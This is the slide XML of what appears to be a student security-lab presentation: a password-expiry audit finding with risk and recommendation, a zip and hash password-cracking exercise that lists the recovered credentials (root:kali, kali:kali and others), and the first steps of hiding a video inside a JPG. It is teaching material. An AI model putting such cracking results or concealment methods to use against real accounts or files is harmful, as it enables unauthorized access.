            <a:ext cx="533400" cy="40386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91"/>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rPr lang="en-US"/>
              <a:t>3. Password aging limits not found</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732" name="Google Shape;732;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="1435608"/>
            <a:ext cx="4416552" cy="3977640"/>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Clr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="733" name="Google Shape;733;p91"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="394450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1040525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>During the audit we observed that the password is set not to expire for the administrator and the user account.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Password aging limit enforce password changing on regular basis.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16225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                                  HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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1087825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Lack of password expiry may allow the compromised user account to be misused for a long time without being detected. </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r h="406750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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FBFBF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1352700">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to set password expiry of atleast 30 days for administrator and 60 days for user account.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lt1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="Google Shape;734;p91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7330440" y="2880360"/>
            <a:ext cx="502920" cy="39624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735" name="Google Shape;735;p91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9265920" y="2880360"/>
            <a:ext cx="502920" cy="396240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF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736" name="Google Shape;736;p91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10873740" y="2880360"/>
            <a:ext cx="502920" cy="39624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92"/>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rPr lang="en-US"/>
              <a:t>Password aging limits not found</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="742" name="Google Shape;742;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="654050" y="1746766"/>
            <a:ext cx="9221470" cy="4499420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="743" name="Google Shape;743;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="784860" y="1270754"/>
            <a:ext cx="309372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OUTPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="Google Shape;744;p92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654050" y="3192780"/>
            <a:ext cx="2950210" cy="315992"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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745" name="Google Shape;745;p92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2206883"/>
            <a:ext cx="944880" cy="52578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93"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Computer, Security, Padlock, Hacker" id="751" name="Google Shape;751;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752" name="Google Shape;752;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7245532" y="2769326"/>
            <a:ext cx="3927566"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rgbClr val="DDEAF6"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>PASSWORD CRACKING</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94"/>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rPr lang="en-US"/>
              <a:t>OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758" name="Google Shape;758;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="1435607"/>
            <a:ext cx="11164824" cy="5104529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>We have  a zip file named, m1ss10n.zip which has pass.txt file.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>The pass.txt file has been protected with a password which is to be cracked.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>The pass.txt file consists of hash passwords which need to be identified and found.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="280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95"/>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rPr lang="en-US"/>
              <a:t>PASSWORDS FOUND</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764" name="Google Shape;764;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687978" y="1672046"/>
            <a:ext cx="10824754"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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Password of pass.txt file: !!!123blahblah !!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Username and passwords found in pass.txt:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>root : kali</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>kali : kali</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Varun : !@#$%^&amp;</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96"/>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rPr lang="en-US"/>
              <a:t>OUTPUT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="770" name="Google Shape;770;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="865652" y="1632109"/>
            <a:ext cx="8826987" cy="1215594"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="771" name="Google Shape;771;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="865652" y="3757386"/>
            <a:ext cx="8826987" cy="2190567"/>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97"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="777" name="Google Shape;777;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="778" name="Google Shape;778;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3637280" y="2438400"/>
            <a:ext cx="5151120"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dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>HIDING A VIDEO BEHIND AN IMAGE</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98"/>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rPr lang="en-US"/>
              <a:t>OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="784" name="Google Shape;784;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539495" y="1435607"/>
            <a:ext cx="11304162" cy="5069695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>We have to hide a video behind an image in .jpg format.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>We have to find a way to run the video using the new image.</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99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="448056"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>STEPS AND OUTPUT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="790" name="Google Shape;790;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="1435608"/>
            <a:ext cx="11077738" cy="3977640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Create b1.jpg on the desktop. Save “video.mp4” on the desktop.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Create a zip file of “video.mp4” and save it on desktop.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="791" name="Google Shape;791;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2875788"/>
            <a:ext cx="6050280" cy="30516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elcomeDoc">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2021-06-26T13:39:40Z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